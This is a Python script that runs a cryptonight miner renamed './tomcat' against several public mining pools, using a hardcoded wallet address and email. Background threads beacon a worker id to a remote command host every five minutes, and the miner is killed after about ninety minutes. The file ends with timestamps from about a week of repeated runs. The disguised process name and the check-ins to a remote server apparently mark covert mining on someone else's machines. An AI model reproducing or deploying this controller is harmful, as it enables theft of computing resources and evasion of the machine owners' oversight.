import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:07.257774
#2018-02-17 17:11:04.145893
#2018-02-17 18:59:03.628307
#2018-02-17 20:46:04.003586
#2018-02-17 22:33:04.076415
#2018-02-18 00:16:07.602956
#2018-02-18 02:07:04.955804
#2018-02-18 03:54:04.048064
#2018-02-18 05:42:07.177469
#2018-02-18 07:34:05.862419
#2018-02-18 09:22:03.621937
#2018-02-18 11:09:05.923617
#2018-02-18 12:56:06.696755
#2018-02-18 14:43:06.802140
#2018-02-18 16:33:06.357066
#2018-02-18 18:22:06.875513
#2018-02-18 20:08:05.916722
#2018-02-18 21:55:05.280242
#2018-02-18 23:44:06.281238
#2018-02-19 01:29:06.698931
#2018-02-19 03:18:02.218226
#2018-02-19 05:03:03.354455
#2018-02-19 06:47:01.863443
#2018-02-19 08:36:08.393030
#2018-02-19 10:25:01.987894
#2018-02-19 12:13:05.761515
#2018-02-19 13:59:08.390759
#2018-02-19 15:48:01.947226
#2018-02-19 17:35:05.322890
#2018-02-19 19:24:05.400337
#2018-02-19 21:12:01.820545
#2018-02-19 22:57:06.695712
#2018-02-20 00:42:01.375195
#2018-02-20 02:32:01.663991
#2018-02-20 04:21:07.248868
#2018-02-20 06:06:07.887461
#2018-02-20 07:51:05.467301
#2018-02-20 09:37:05.701795
#2018-02-20 11:20:01.441220
#2018-02-20 13:07:01.824531
#2018-02-20 14:53:01.703797
#2018-02-20 16:38:06.831448
#2018-02-20 18:25:06.127552
#2018-02-20 20:18:01.571558
#2018-02-20 22:05:08.339094
#2018-02-20 23:47:05.328608
#2018-02-21 01:32:07.163827
#2018-02-21 03:19:06.533085
#2018-02-21 05:07:04.227327
#2018-02-21 06:54:06.116404
#2018-02-21 08:41:05.870996
#2018-02-21 10:27:07.382135
#2018-02-21 12:14:08.147075
#2018-02-21 14:03:08.121865
#2018-02-21 15:49:08.946070
#2018-02-21 17:41:04.658314
#2018-02-21 19:26:04.147812
#2018-02-21 21:13:06.796498
#2018-02-21 23:00:11.625653
#2018-02-22 00:51:05.526058
#2018-02-22 02:40:06.839627
#2018-02-22 04:28:04.021212
#2018-02-22 06:13:05.970482
#2018-02-22 07:57:08.008386
#2018-02-22 09:48:02.235226
#2018-02-22 11:34:09.300163
#2018-02-22 13:21:09.198156
#2018-02-22 15:11:05.766421
#2018-02-22 16:54:09.103369
#2018-02-22 18:42:01.254921
#2018-02-22 20:33:05.893263
#2018-02-22 22:18:03.775271
#2018-02-23 00:06:02.195603
#2018-02-23 01:54:01.995823
#2018-02-23 03:42:04.456240
#2018-02-23 05:26:05.157653
#2018-02-23 07:12:05.695268
#2018-02-23 09:17:01.294327
#2018-02-23 11:25:04.994677
#2018-02-23 13:16:06.802875
#2018-02-23 15:01:08.966261
#2018-02-23 16:49:07.034569
#2018-02-23 18:38:07.974607
#2018-02-23 20:24:06.342042
#2018-02-23 22:11:05.991470
#2018-02-23 23:58:05.391133
#2018-02-24 01:47:08.614135
#2018-02-24 03:33:07.625534
#2018-02-24 05:18:03.633947
#2018-02-24 07:06:05.634614
#2018-02-24 08:53:05.868909
#2018-02-24 10:55:08.719464
#2018-02-24 12:44:02.138201
#2018-02-24 14:33:06.563369
#2018-02-24 16:20:04.017813
#2018-02-24 18:14:04.848325
#2018-02-24 20:01:07.739903
#2018-02-24 21:44:06.859166
#2018-02-25 00:41:04.386523
#2018-02-25 04:36:05.879757
#2018-02-25 08:02:05.404783